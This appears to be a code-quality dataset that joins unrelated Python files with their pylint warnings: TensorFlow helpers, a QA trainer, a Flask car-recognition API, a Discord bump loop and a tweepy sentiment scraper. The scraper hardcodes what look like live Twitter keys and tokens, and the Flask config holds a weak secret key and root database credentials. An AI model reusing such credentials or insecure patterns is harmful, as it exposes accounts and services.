11 def linear(args, output_size, bias, bias_start=0.0, scope=None, squeeze=False, wd=0.0, input_keep_prob=1.0,
12            is_train=None):#, name_w='', name_b=''
13     # if args is None or (nest.is_sequence(args) and not args):
14     #     raise ValueError("`args` must be specified")
15     # if not nest.is_sequence(args):
16     #     args = [args]
17
18     flat_args = [flatten(arg, 1) for arg in args]#[210,20]
19
20     # if input_keep_prob < 1.0:
21     #     assert is_train is not None
22     flat_args = [tf.nn.dropout(arg, input_keep_prob) for arg in flat_args]
23
24     total_arg_size = 0#[60]
25     shapes = [a.get_shape() for a in flat_args]
26     for shape in shapes:
27         if shape.ndims != 2:
28             raise ValueError("linear is expecting 2D arguments: %s" % shapes)
29         if shape[1].value is None:
30             raise ValueError("linear expects shape[1] to be provided for shape %s, "
31                              "but saw %s" % (shape, shape[1]))
32         else:
33             total_arg_size += shape[1].value
34     # print(total_arg_size)
35     # exit()
36     dtype = [a.dtype for a in flat_args][0]
37
38     # scope = tf.get_variable_scope()
39     with tf.variable_scope(scope) as outer_scope:
40         weights = tf.get_variable(_WEIGHTS_VARIABLE_NAME, [total_arg_size, output_size], dtype=dtype)
41         if len(flat_args) == 1:
42             res = tf.matmul(flat_args[0], weights)
43         else:
44             res = tf.matmul(tf.concat(flat_args, 1), weights)
45         if not bias:
46             flat_out = res
47         else:
48             with tf.variable_scope(outer_scope) as inner_scope:
49                 inner_scope.set_partitioner(None)
50                 biases = tf.get_variable(
51                     _BIAS_VARIABLE_NAME, [output_size],
52                     dtype=dtype,
53                     initializer=tf.constant_initializer(bias_start, dtype=dtype))
54                 flat_out = tf.nn.bias_add(res, biases)
55
56     out = reconstruct(flat_out, args[0], 1)
57
58     if squeeze:
59         out = tf.squeeze(out, [len(args[0].get_shape().as_list())-1])
60     if wd:
61         add_wd(wd)
62
63     return out
64
65 def softmax(logits, mask=None, scope=None):
66     with tf.name_scope(scope or "Softmax"):
67         if mask is not None:
68             logits = exp_mask(logits, mask)
69         flat_logits = flatten(logits, 1)
70         flat_out = tf.nn.softmax(flat_logits)
71         out = reconstruct(flat_out, logits, 1)
72
73     return out
74
75
76 def softsel(target, logits, mask=None, scope=None):
77     """
78
79     :param target: [ ..., J, d] dtype=float
80     :param logits: [ ..., J], dtype=float
81     :param mask: [ ..., J], dtype=bool
82     :param scope:
83     :return: [..., d], dtype=float
84     """
85     with tf.name_scope(scope or "Softsel"):
86         a = softmax(logits, mask = mask)
87         target_rank = len(target.get_shape().as_list())
88         out = tf.reduce_sum(tf.expand_dims(a, -1) * target, target_rank - 2)
89     return out
90
91 def highway_layer(arg, bias, bias_start=0.0, scope=None, wd=0.0, input_keep_prob=1.0):
92     with tf.variable_scope(scope or "highway_layer"):
93         d = arg.get_shape()[-1]
94         trans = linear([arg], d, bias, bias_start=bias_start, scope='trans', wd=wd, input_keep_prob=input_keep_prob)
95         trans = tf.nn.relu(trans)
96         gate = linear([arg], d, bias, bias_start=bias_start, scope='gate', wd=wd, input_keep_prob=input_keep_prob)
97         gate = tf.nn.sigmoid(gate)
98         out = gate * trans + (1 - gate) * arg
99     return out
100
101
102 def highway_network(arg, num_layers, bias, bias_start=0.0, scope=None, wd=0.0, input_keep_prob=1.0):
103     with tf.variable_scope(scope or "highway_network"):
104         prev = arg
105         cur = None
106         for layer_idx in range(num_layers):
107             cur = highway_layer(prev, bias, bias_start=bias_start, scope="layer_{}".format(layer_idx), wd=wd,
108                                 input_keep_prob=input_keep_prob)
109             prev = cur
110     return cur
111
112 def conv1d(in_, filter_size, height, padding, keep_prob=1.0, scope=None):
113     with tf.variable_scope(scope or "conv1d"):
114         num_channels = in_.get_shape()[-1]
115         filter_ = tf.get_variable("filter", shape=[1, height, num_channels, filter_size], dtype='float')
116         bias = tf.get_variable("bias", shape=[filter_size], dtype='float')
117         strides = [1, 1, 1, 1]
118         in_ = tf.nn.dropout(in_, keep_prob)
119         xxc = tf.nn.conv2d(in_, filter_, strides, padding) + bias  # [N*M, JX, W/filter_stride, d]
120         out = tf.reduce_max(tf.nn.relu(xxc), 2)  # [-1, JX, d]
121     return out
122
123
124 def multi_conv1d(in_, filter_sizes, heights, padding, keep_prob=1.0, scope=None):
125     with tf.variable_scope(scope or "multi_conv1d"):
126         assert len(filter_sizes) == len(heights)
127         outs = []
128         for filter_size, height in zip(filter_sizes, heights):
129             if filter_size == 0:
130                 continue
131             out = conv1d(in_, filter_size, height, padding, keep_prob=keep_prob, scope="conv1d_{}".format(height))
132             outs.append(out)
133         concat_out = tf.concat(outs, axis=2)
134     return concat_out
135
136
137 if __name__ == '__main__':
138     a = tf.Variable(np.random.random(size=(2,2,4)))
139     b = tf.Variable(np.random.random(size=(2,3,4)))
140     c = tf.tile(tf.expand_dims(a, 2), [1, 1, 3, 1])
141     test = flatten(c,1)
142     out = reconstruct(test, c, 1)
143     d = tf.tile(tf.expand_dims(b, 1), [1, 2, 1, 1])
144     e = linear([c,d,c*d],1,bias = False,scope = "test",)
145     # f = softsel(d, e)
146     with tf.Session() as sess:
147         tf.global_variables_initializer().run()
148         print(sess.run(test))
149         print(sess.run(tf.shape(out)))
150         exit()
151         print(sess.run(tf.shape(a)))
152         print(sess.run(a))
153         print(sess.run(tf.shape(b)))
154         print(sess.run(b))
155         print(sess.run(tf.shape(c)))
156         print(sess.run(c))
157         print(sess.run(tf.shape(d)))
158         print(sess.run(d))
159         print(sess.run(tf.shape(e)))
160         print(sess.run(e))
11 - refactor: too-many-arguments
11 - refactor: too-many-positional-arguments
11 - refactor: too-many-locals
56 - warning: redefined-outer-name
29 - refactor: no-else-raise
12 - warning: unused-argument
71 - warning: redefined-outer-name
86 - warning: redefined-outer-name
88 - warning: redefined-outer-name
91 - refactor: too-many-arguments
91 - refactor: too-many-positional-arguments
93 - warning: redefined-outer-name
98 - warning: redefined-outer-name
102 - refactor: too-many-arguments
102 - refactor: too-many-positional-arguments
112 - refactor: too-many-arguments
112 - refactor: too-many-positional-arguments
120 - warning: redefined-outer-name
124 - refactor: too-many-arguments
124 - refactor: too-many-positional-arguments
131 - warning: redefined-outer-name
151 - warning: unreachable
150 - refactor: consider-using-sys-exit
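A minimal illustration of the no-else-raise hint flagged at line 29, using plain tuples as a stand-in for the TF shape objects checked in linear(): because `raise` leaves the function, the `else` branch is redundant.

def total_size(shapes):
    """Sum the second dimension of (rows, cols) shape tuples."""
    total = 0
    for shape in shapes:
        if shape[1] is None:
            raise ValueError("second dimension must be known: %s" % (shape,))
        total += shape[1]  # no else needed after the raise
    return total

print(total_size([(2, 3), (2, 4)]))  # 7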
1 from tensorflow import flags
2 import tensorflow as tf
3 from config import Singleton
4 import data_helper
5
6 import datetime,os
7
8 import models
9 import numpy as np
10 import evaluation
11
12 import sys
13 import logging
14
15 import time
16 now = int(time.time())
17 timeArray = time.localtime(now)
18 timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
19 log_filename = "log/" +time.strftime("%Y%m%d", timeArray)
20
21 program = os.path.basename('program')
22 logger = logging.getLogger(program)
23 if not os.path.exists(log_filename):
24     os.makedirs(log_filename)
25 logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=log_filename+'/qa.log',filemode='w')
26 logging.root.setLevel(level=logging.INFO)
27 logger.info("running %s" % ' '.join(sys.argv))
28
29
30
31 from data_helper import log_time_delta,getLogger
32
33 logger=getLogger()
34
35
36
37
38 args = Singleton().get_qcnn_flag()
39
40 args._parse_flags()
41 opts=dict()
42 logger.info("\nParameters:")
43 for attr, value in sorted(args.__flags.items()):
44     logger.info(("{}={}".format(attr.upper(), value)))
45     opts[attr]=value
46
47
48 train,test,dev = data_helper.load(args.data,filter = args.clean)
49
50 q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
51 a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
52
53 alphabet = data_helper.get_alphabet([train,test,dev],dataset=args.data )
54 logger.info('the number of words :%d '%len(alphabet))
55
56 if args.data=="quora" or args.data=="8008" :
57     print("cn embedding")
58     embedding = data_helper.get_embedding(alphabet,dim=200,language="cn",dataset=args.data )
59     train_data_loader = data_helper.getBatch48008
60 else:
61     embedding = data_helper.get_embedding(alphabet,dim=300,dataset=args.data )
62     train_data_loader = data_helper.get_mini_batch
63 opts["embeddings"] =embedding
64 opts["vocab_size"]=len(alphabet)
65 opts["max_input_right"]=a_max_sent_length
66 opts["max_input_left"]=q_max_sent_length
67 opts["filter_sizes"]=list(map(int, args.filter_sizes.split(",")))
68
69 print("innitilize over")
70
71
72
73
74 #with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
75 with tf.Graph().as_default():
76     # with tf.device("/cpu:0"):
77     session_conf = tf.ConfigProto()
78     session_conf.allow_soft_placement = args.allow_soft_placement
79     session_conf.log_device_placement = args.log_device_placement
80     session_conf.gpu_options.allow_growth = True
81     sess = tf.Session(config=session_conf)
82     model=models.setup(opts)
83     model.build_graph()
84     saver = tf.train.Saver()
85
86     # ckpt = tf.train.get_checkpoint_state("checkpoint")
87     # if ckpt and ckpt.model_checkpoint_path:
88     #     # Restores from checkpoint
89     #     saver.restore(sess, ckpt.model_checkpoint_path)
90     # if os.path.exists("model") :
91     #     import shutil
92     #     shutil.rmtree("model")
93     # builder = tf.saved_model.builder.SavedModelBuilder("./model")
94     # builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
95     # builder.save(True)
96     # variable_averages = tf.train.ExponentialMovingAverage( model)
97     # variables_to_restore = variable_averages.variables_to_restore()
98     # saver = tf.train.Saver(variables_to_restore)
99     # for name in variables_to_restore:
100     #     print(name)
101
102     sess.run(tf.global_variables_initializer())
103     @log_time_delta
104     def predict(model,sess,batch,test):
105         scores = []
106         for data in batch:
107             score = model.predict(sess,data)
108             scores.extend(score)
109         return np.array(scores[:len(test)])
110
111     best_p1=0
112
113
114
115
116     for i in range(args.num_epoches):
117
118         for data in train_data_loader(train,alphabet,args.batch_size,model=model,sess=sess):
119             # for data in data_helper.getBatch48008(train,alphabet,args.batch_size):
120             _, summary, step, loss, accuracy,score12, score13, see = model.train(sess,data)
121             time_str = datetime.datetime.now().isoformat()
122             print("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
123             logger.info("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
124 #<<<<<<< HEAD
125 #
126 #
127 #        if i>0 and i % 5 ==0:
128 #            test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
129 #
130 #            predicted_test = predict(model,sess,test_datas,test)
131 #            map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
132 #
133 #            logger.info('map_mrr test' +str(map_mrr_test))
134 #            print('map_mrr test' +str(map_mrr_test))
135 #
136 #            test_datas = data_helper.get_mini_batch_test(dev,alphabet,args.batch_size)
137 #            predicted_test = predict(model,sess,test_datas,dev)
138 #            map_mrr_test = evaluation.evaluationBypandas(dev,predicted_test)
139 #
140 #            logger.info('map_mrr dev' +str(map_mrr_test))
141 #            print('map_mrr dev' +str(map_mrr_test))
142 #            map,mrr,p1 = map_mrr_test
143 #            if p1>best_p1:
144 #                best_p1=p1
145 #                filename= "checkpoint/"+args.data+"_"+str(p1)+".model"
146 #                save_path = saver.save(sess, filename)
147 #                # load_path = saver.restore(sess, model_path)
148 #
149 #                import shutil
150 #                shutil.rmtree("model")
151 #                builder = tf.saved_model.builder.SavedModelBuilder("./model")
152 #                builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
153 #                builder.save(True)
154 #
155 #
156 #=======
157
158         test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
159
160         predicted_test = predict(model,sess,test_datas,test)
161         map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
162
163         logger.info('map_mrr test' +str(map_mrr_test))
164         print('epoch '+ str(i) + 'map_mrr test' +str(map_mrr_test))
165
27 - warning: logging-not-lazy
40 - warning: protected-access
41 - refactor: use-dict-literal
43 - warning: protected-access
50 - warning: unnecessary-lambda
51 - warning: unnecessary-lambda
56 - refactor: consider-using-in
104 - warning: redefined-outer-name
104 - warning: redefined-outer-name
104 - warning: redefined-outer-name
106 - warning: redefined-outer-name
1 - warning: unused-import
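For the logging-not-lazy warning at line 27 above, a small sketch: passing the arguments to the logging call (instead of %-formatting the string yourself) defers the interpolation until the record is actually emitted.

import logging

logger = logging.getLogger(__name__)
# lazy %-style arguments: formatted only if INFO records are handled
logger.info("running %s", " ".join(["train.py", "--data", "wiki"]))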
1 # For this solution I'm using TextBlob, using it's integration with WordNet.
2
3 from textblob import TextBlob
4 from textblob import Word
5 from textblob.wordnet import VERB
6 import nltk
7 import os
8 import sys
9 import re
10 import json
11
12 results = { "results" : [] }
13
14 #Override NLTK data path to use the one I uploaded in the folder
15 dir_path = os.path.dirname(os.path.realpath(__file__))
16 nltk_path = dir_path + os.path.sep + "nltk_data"
17 nltk.data.path= [nltk_path]
18
19 #Text to analyze
20 TEXT = """
21 Take this paragraph of text and return an alphabetized list of ALL unique words. A unique word is any form of a word often communicated
22 with essentially the same meaning. For example,
23 fish and fishes could be defined as a unique word by using their stem fish. For each unique word found in this entire paragraph,
24 determine the how many times the word appears in total.
25 Also, provide an analysis of what sentence index position or positions the word is found.
26 The following words should not be included in your analysis or result set: "a", "the", "and", "of", "in", "be", "also" and "as".
27 Your final result MUST be displayed in a readable console output in the same format as the JSON sample object shown below.
28 """
29 TEXT = TEXT.lower()
30
31 WORDS_NOT_TO_CONSIDER = ["a", "the", "and", "of", "in", "be", "also", "as"]
32 nlpText= TextBlob(TEXT)
33
34 def getSentenceIndexesForWord(word, sentences):
35     sentenceIndexes = []
36     for index, sentence in enumerate(sentences):
37         count = sum(1 for _ in re.finditer(r'\b%s\b' % re.escape(word.lower()), sentence))
38         if count > 0:
39             sentenceIndexes.append(index)
40     return sentenceIndexes
41
42 #1: Get all words, excluding repetitions and all the sentences in the text
43 nlpTextWords = sorted(set(nlpText.words))
44 nlpTextSentences = nlpText.raw_sentences
45
46 #2 Get results
47 synonymsList = []
48 allreadyReadWords = []
49 for word in nlpTextWords:
50     if word not in WORDS_NOT_TO_CONSIDER and word not in allreadyReadWords:
51         timesInText = nlpText.word_counts[word]
52
53         #Get sentence indexes where the word can be found
54         sentenceIndexes = getSentenceIndexesForWord(word, nlpTextSentences)
55
56         #Check for synonyms
57         for word2 in nlpTextWords:
58             if word2 not in WORDS_NOT_TO_CONSIDER and ( word.lower() != word2.lower() and len(list(set(word.synsets) & set(word2.synsets))) > 0 ):
59                 #If I find a synonym of the word I add it to the list of words allready read and add the times that synonym appeared in the text to the total
60                 #count of the unique word and the corresponding sentence indexes
61                 allreadyReadWords.append(word2)
62                 timesInText = timesInText + nlpText.word_counts[word2]
63                 sentenceIndexes += getSentenceIndexesForWord(word2,nlpTextSentences)
64
65         allreadyReadWords.append(word)
66
67         results["results"].append({"word" : word.lemmatize(), #I return the lemma of the word because TextBlob's stems seem to be wrong for certain words
68                                    "total-occurances": timesInText,
69                                    "sentence-indexes": sorted(set(sentenceIndexes))})
70
71 print(json.dumps(results, indent=4))
72
73
74
34 - warning: redefined-outer-name
35 - warning: redefined-outer-name
4 - warning: unused-import
5 - warning: unused-import
8 - warning: unused-import
1 import requests
2 import time
3
4 token = "TOKEN"
5
6 headers = {
7     'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
8     'Authorization' : token
9 }
10
11 id = input(f"[?] Salon ID: ")
12 print("")
13
14 while True:
15     requests.post(
16         f"https://discord.com/api/channels/{id}/messages",
17         headers = headers,
18         json = {"content" : "!d bump"}
19     )
20     print("[+] Serveur Bumpé")
21     time.sleep(121 * 60)
11 - warning: redefined-builtin
11 - warning: f-string-without-interpolation
15 - warning: missing-timeout
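A one-shot sketch of the three fixes above (the loop is dropped for brevity): `channel_id` avoids shadowing the `id` builtin, the `f` prefix goes where nothing is interpolated, and an explicit timeout satisfies missing-timeout.

import requests

channel_id = input("[?] Salon ID: ")  # plain string: no f-string needed
requests.post(
    "https://discord.com/api/channels/{}/messages".format(channel_id),
    headers={"Authorization": "TOKEN"},  # placeholder token, as in the sample
    json={"content": "!d bump"},
    timeout=30,                          # fixes missing-timeout
)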
1 # Madis Settings
2 MADIS_PATH='/Users/alexiatopalidou/Desktop/erg/madis/src'
3
4 # Webserver Settings
5 # IMPORTANT: The port must be available.
6 web_port = 9090  # must be integer (this is wrong:'9090')
Clean Code: No Issues Detected
1 # -*- coding: utf-8 -*-
2 import os
3 import Queue
4 import random
5 from functools import wraps
6
7 import arrow
8 from flask import g, request
9 from flask_restful import reqparse, Resource
10 from passlib.hash import sha256_crypt
11 from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
12
13 from car_recg import app, db, api, auth, limiter, logger, access_logger
14 from models import Users, Scope
15 import helper
16
17
18 def verify_addr(f):
19     """IP address whitelist"""
20     @wraps(f)
21     def decorated_function(*args, **kwargs):
22         if not app.config['WHITE_LIST_OPEN'] or request.remote_addr == '127.0.0.1' or request.remote_addr in app.config['WHITE_LIST']:
23             pass
24         else:
25             return {'status': '403.6',
26                     'message': u'Forbidden: the client IP address is rejected'}, 403
27         return f(*args, **kwargs)
28     return decorated_function
29
30
31 @auth.verify_password
32 def verify_password(username, password):
33     if username.lower() == 'admin':
34         user = Users.query.filter_by(username='admin').first()
35     else:
36         return False
37     if user:
38         return sha256_crypt.verify(password, user.password)
39     return False
40
41
42 def verify_token(f):
43     """Token verification decorator"""
44     @wraps(f)
45     def decorated_function(*args, **kwargs):
46         if not request.headers.get('Access-Token'):
47             return {'status': '401.6', 'message': 'missing token header'}, 401
48         token_result = verify_auth_token(request.headers['Access-Token'],
49                                          app.config['SECRET_KEY'])
50         if not token_result:
51             return {'status': '401.7', 'message': 'invalid token'}, 401
52         elif token_result == 'expired':
53             return {'status': '401.8', 'message': 'token expired'}, 401
54         g.uid = token_result['uid']
55         g.scope = set(token_result['scope'])
56
57         return f(*args, **kwargs)
58     return decorated_function
59
60
61 def verify_scope(scope):
62     def scope(f):
63         """Scope verification decorator"""
64         @wraps(f)
65         def decorated_function(*args, **kwargs):
66             if 'all' in g.scope or scope in g.scope:
67                 return f(*args, **kwargs)
68             else:
69                 return {}, 405
70         return decorated_function
71     return scope
72
73
74 class Index(Resource):
75
76     def get(self):
77         return {
78             'user_url': '%suser{/user_id}' % (request.url_root),
79             'scope_url': '%suser/scope' % (request.url_root),
80             'token_url': '%stoken' % (request.url_root),
81             'recg_url': '%sv1/recg' % (request.url_root),
82             'uploadrecg_url': '%sv1/uploadrecg' % (request.url_root),
83             'state_url': '%sv1/state' % (request.url_root)
84         }, 200, {'Cache-Control': 'public, max-age=60, s-maxage=60'}
85
86
87 class RecgListApiV1(Resource):
88
89     def post(self):
90         parser = reqparse.RequestParser()
91
92         parser.add_argument('imgurl', type=unicode, required=True,
93                             help='A jpg url is require', location='json')
94         parser.add_argument('coord', type=list, required=True,
95                             help='A coordinates array is require',
96                             location='json')
97         args = parser.parse_args()
98
99         # Message queue used for the callback
100         que = Queue.Queue()
101
102         if app.config['RECGQUE'].qsize() > app.config['MAXSIZE']:
103             return {'message': 'Server Is Busy'}, 449
104
105         imgname = '%32x' % random.getrandbits(128)
106         imgpath = os.path.join(app.config['IMG_PATH'], '%s.jpg' % imgname)
107         try:
108             helper.get_url_img(request.json['imgurl'], imgpath)
109         except Exception as e:
110             logger.error('Error url: %s' % request.json['imgurl'])
111             return {'message': 'URL Error'}, 400
112
113         app.config['RECGQUE'].put((10, request.json, que, imgpath))
114
115         try:
116             recginfo = que.get(timeout=15)
117
118             os.remove(imgpath)
119         except Queue.Empty:
120             return {'message': 'Timeout'}, 408
121         except Exception as e:
122             logger.error(e)
123         else:
124             return {
125                 'imgurl': request.json['imgurl'],
126                 'coord': request.json['coord'],
127                 'recginfo': recginfo
128             }, 201
129
130
131 class StateListApiV1(Resource):
132
133     def get(self):
134         return {
135             'threads': app.config['THREADS'],
136             'qsize': app.config['RECGQUE'].qsize()
137         }
138
139
140 class UploadRecgListApiV1(Resource):
141
142     def post(self):
143         # Folder path (string)
144         filepath = os.path.join(app.config['UPLOAD_PATH'],
145                                 arrow.now().format('YYYYMMDD'))
146         if not os.path.exists(filepath):
147             os.makedirs(filepath)
148         try:
149             # Uploaded file name: random 32-char hex string
150             imgname = '%32x' % random.getrandbits(128)
151             # Absolute file path (string)
152             imgpath = os.path.join(filepath, '%s.jpg' % imgname)
153             f = request.files['file']
154             f.save(imgpath)
155         except Exception as e:
156             logger.error(e)
157             return {'message': 'File error'}, 400
158
159         # Message queue used for the callback (object)
160         que = Queue.Queue()
161         # Recognition parameter dict
162         r = {'coord': []}
163         app.config['RECGQUE'].put((9, r, que, imgpath))
164         try:
165             recginfo = que.get(timeout=app.config['TIMEOUT'])
166         except Queue.Empty:
167             return {'message': 'Timeout'}, 408
168         except Exception as e:
169             logger.error(e)
170         else:
171             return {'coord': r['coord'], 'recginfo': recginfo}, 201
172
173 api.add_resource(Index, '/')
174 api.add_resource(RecgListApiV1, '/v1/recg')
175 api.add_resource(StateListApiV1, '/v1/state')
176 api.add_resource(UploadRecgListApiV1, '/v1/uploadrecg')
26 - warning: redundant-u-string-prefix
48 - error: undefined-variable
50 - refactor: no-else-return
62 - error: function-redefined
66 - refactor: no-else-return
74 - refactor: too-few-public-methods
92 - error: undefined-variable
109 - warning: broad-exception-caught
121 - warning: broad-exception-caught
89 - refactor: inconsistent-return-statements
97 - warning: unused-variable
109 - warning: unused-variable
87 - refactor: too-few-public-methods
131 - refactor: too-few-public-methods
155 - warning: broad-exception-caught
168 - warning: broad-exception-caught
142 - refactor: inconsistent-return-statements
140 - refactor: too-few-public-methods
11 - warning: unused-import
13 - warning: unused-import
13 - warning: unused-import
13 - warning: unused-import
14 - warning: unused-import
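The function-redefined error at line 62 is the most serious finding here: `verify_scope`'s inner function is also named `scope`, clobbering the argument it is supposed to check. A hedged sketch of the corrected decorator:

from functools import wraps

from flask import g

def verify_scope(scope):
    def decorator(f):                       # distinct name: no redefinition
        @wraps(f)
        def decorated_function(*args, **kwargs):
            if 'all' in g.scope or scope in g.scope:
                return f(*args, **kwargs)
            return {}, 405                  # no else after return needed
        return decorated_function
    return decorator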
1 # -*- coding: utf-8 -*-
2 import Queue
3
4
5 class Config(object):
6     # Secret key (string)
7     SECRET_KEY = 'hellokitty'
8     # Server name (string)
9     HEADER_SERVER = 'SX-CarRecgServer'
10     # Hash rounds (int)
11     ROUNDS = 123456
12     # Token lifetime, 1 hour by default (int)
13     EXPIRES = 7200
14     # Database connection (string)
15     SQLALCHEMY_DATABASE_URI = 'mysql://root:root@127.0.0.1/hbc_store'
16     # Database connection binds (dict)
17     SQLALCHEMY_BINDS = {}
18     # User permission scopes (dict)
19     SCOPE_USER = {}
20     # Whitelist enabled (bool)
21     WHITE_LIST_OPEN = True
22     # Whitelist (set)
23     WHITE_LIST = set()
24     # Number of worker threads (int)
25     THREADS = 4
26     # Maximum queue size allowed: 16x the thread count (int)
27     MAXSIZE = THREADS * 16
28     # Image download folder (string)
29     IMG_PATH = 'img'
30     # Image crop folder (string)
31     CROP_PATH = 'crop'
32     # Timeout (int)
33     TIMEOUT = 5
34     # Recognition priority queue (object)
35     RECGQUE = Queue.PriorityQueue()
36     # Quit flag (bool)
37     IS_QUIT = False
38     # User dict (dict)
39     USER = {}
40     # Upload save path (string)
41     UPLOAD_PATH = 'upload'
42
43
44 class Develop(Config):
45     DEBUG = True
46
47
48 class Production(Config):
49     DEBUG = False
50
51
52 class Testing(Config):
53     TESTING = True
5 - refactor: useless-object-inheritance
5 - refactor: too-few-public-methods
44 - refactor: too-few-public-methods
48 - refactor: too-few-public-methods
52 - refactor: too-few-public-methods
1 from car_recg import app
2 from car_recg.recg_ser import RecgServer
3 from ini_conf import MyIni
4
5 if __name__ == '__main__':
6     rs = RecgServer()
7     rs.main()
8     my_ini = MyIni()
9     sys_ini = my_ini.get_sys_conf()
10     app.config['THREADS'] = sys_ini['threads']
11     app.config['MAXSIZE'] = sys_ini['threads'] * 16
12     app.run(host='0.0.0.0', port=sys_ini['port'], threaded=True)
13     del rs
14     del my_ini
Clean Code: No Issues Detected
1 '''
2 Input- zoho123
3 Output- ohoz123
4
5 '''
6 char= input("Enter the string: ")
7 char2= list(char)
8 num= "1234567890"
9 list1= [0]*len(char)
10 list2=[]
11 for i in range(len(char)):
12     if char2[i] not in num:
13         list2.append( char2.index( char2[i]))
14         char2[i]= "*"
15 list2.reverse()
16 k=0
17 for j in range( len(char) ):
18     if j in list2:
19         list1[j]= char[list2[k]]
20         k= k+1
21     else:
22         list1[j]= char[j]
23 ch=""
24 for l in range(len(list1)):
25     ch= ch+ list1[l]
26 print(ch)
Clean Code: No Issues Detected
1 import os
2 import sys
3 import argparse
4 from PIL import Image  # From Pillow (pip install Pillow)
5
6 def resize_photos(dir, new_x, new_y, scale):
7     if(not os.path.exists(dir)):
8         # if not in full path format (/usrers/user/....)
9         # check if path is in local format (folder is in current working directory)
10         if(not os.path.exists(os.path.join(os.getcwd(), dir))):
11             print(dir + " does not exist.")
12             exit()
13         else:
14             # path is not a full path, but folder exists in current working directory
15             # convert path to full path
16             dir = os.path.join(os.getcwd(), dir)
17
18     i = 1  # image counter for print statements
19     for f in os.listdir(dir):
20         if(not f.startswith('.') and '.' in f):
21             # accepted image types. add more types if you need to support them!
22             accepted_types = ["jpg", "png", "bmp"]
23             if(f[-3:].lower() in accepted_types):
24                 # checks last 3 letters of file name to check file type (png, jpg, bmp...)
25                 # TODO: need to handle filetypes of more than 3 letters (for example, jpeg)
26                 path = os.path.join(dir, f)
27                 img = Image.open(path)
28
29                 if(scale > 0):
30                     w, h = img.size
31                     newIm = img.resize((w*scale, h*scale))
32                 else:
33                     newIm = img.resize((new_x, new_y))
34
35                 newIm.save(path)
36                 print("Image #" + str(i) + " finsihed resizing: " + path)
37                 i=i+1
38             else:
39                 print(f + " of type: " + f[-3:].lower() + " is not an accepted file type. Skipping.")
40     print("ALL DONE :) Resized: " + str(i) + " photos")
41
42 if __name__ == "__main__":
43     parser = argparse.ArgumentParser()
44     parser.add_argument("-d", "-directory", help="(String) Specify the folder path of images to resize")
45     parser.add_argument("-s", "-size", help="(Integer) New pixel value of both width and height. To specify width and height seperately, use -x and -y.")
46     parser.add_argument("-x", "-width", help="(Integer) New pixel value of width")
47     parser.add_argument("-y", "-height", help="(Integer) New pixel value of height")
48     parser.add_argument("-t", "-scale", help="(Integer) Scales pixel sizes.")
49
50     args = parser.parse_args()
51
52     if(not args.d or ((not args.s) and (not args.x and not args.y) and (not args.t))):
53         print("You have error(s)...\n")
54         if(not args.d):
55             print("+ DIRECTORY value missing Please provide a path to the folder of images using the argument '-d'\n")
56         if((not args.s) and (not args.x or not args.y) and (not args.t)):
57             print("+ SIZE value(s) missing! Please provide a new pixel size. Do this by specifying -s (width and height) OR -x (width) and -y (height) values OR -t (scale) value")
58         exit()
59
60     x = 0
61     y = 0
62     scale = 0
63     if(args.s):
64         x = int(args.s)
65         y = int(args.s)
66     elif(args.x and args.y):
67         x = int(args.x)
68         y = int(args.y)
69     elif(args.t):
70         scale = int(args.t)
71
72     print("Resizing all photos in: " + args.d + " to size: " + str(x)+"px,"+str(y)+"px")
73     resize_photos(args.d, x, y, scale)
25 - warning: fixme
6 - warning: redefined-builtin
6 - warning: redefined-outer-name
12 - refactor: consider-using-sys-exit
58 - refactor: consider-using-sys-exit
2 - warning: unused-import
1 import tweepy
2 import csv
3 import pandas as pd
4 from textblob import TextBlob
5 import matplotlib.pyplot as plt
6
7 ####input your credentials here
8 consumer_key = 'FgCG8zcxF4oINeuAqUYzOw9xh'
9 consumer_secret = 'SrSu7WhrYUpMZnHw7a5ui92rUA1n2jXNoZVb3nJ5wEsXC5xlN9'
10 access_token = '975924102190874624-uk5zGlYRwItkj7pZO2m89NefRm5DFLg'
11 access_token_secret = 'ChvmTjG8hl61xUrXkk3AdKcXMlvAKf4ise1kIQLKsnPu4'
12
13 auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
14 auth.set_access_token(access_token, access_token_secret)
15 api = tweepy.API(auth,wait_on_rate_limit=True)
16
17 # Open/Create a file to append data
18 csvFile = open('tweets.csv', 'w+')
19 # Use csv Writer
20 csvWriter = csv.writer(csvFile)
21 tag = "#DonaldTrump"
22 limit = 0
23 res = ""
24 positive = 0
25 negative = 0
26 neutral = 0
27 csvWriter.writerow(["ID", "Username", "Twitter @", "Tweet","Tweeted At", "Favourite Count", "Retweet Count", "Sentiment"])
28 csvWriter.writerow([])
29
30 for tweet in tweepy.Cursor(api.search,q=""+tag,count=350,lang="en",tweet_mode = "extended").items():
31     # print (tweet.created_at, tweet.text)
32     temp = tweet.full_text
33     if temp.startswith('RT @'):
34       continue
35     blob = TextBlob(tweet.full_text)
36     if blob.sentiment.polarity > 0:
37         res = "Positive"
38         positive = positive+1
39     elif blob.sentiment.polarity == 0:
40         res = "Neutral"
41         neutral = neutral+1
42     else:
43         res = "Negative"
44         negative = negative+1
45
46
47     print ("ID:", tweet.id)
48     print ("User ID:", tweet.user.id)
49     print ("Name: ", tweet.user.name)
50     print ("Twitter @:", tweet.user.screen_name)
51     print ("Text:", tweet.full_text)
52     print ("Tweet length:", len(tweet.full_text))
53     print ("Created:(UTC)", tweet.created_at)
54     print ("Favorite Count:", tweet.favorite_count)
55     print ("Retweet count:", tweet.retweet_count)
56     print ("Sentiment:", res)
57     # print ("Retweeted? :", tweet.retweeted)
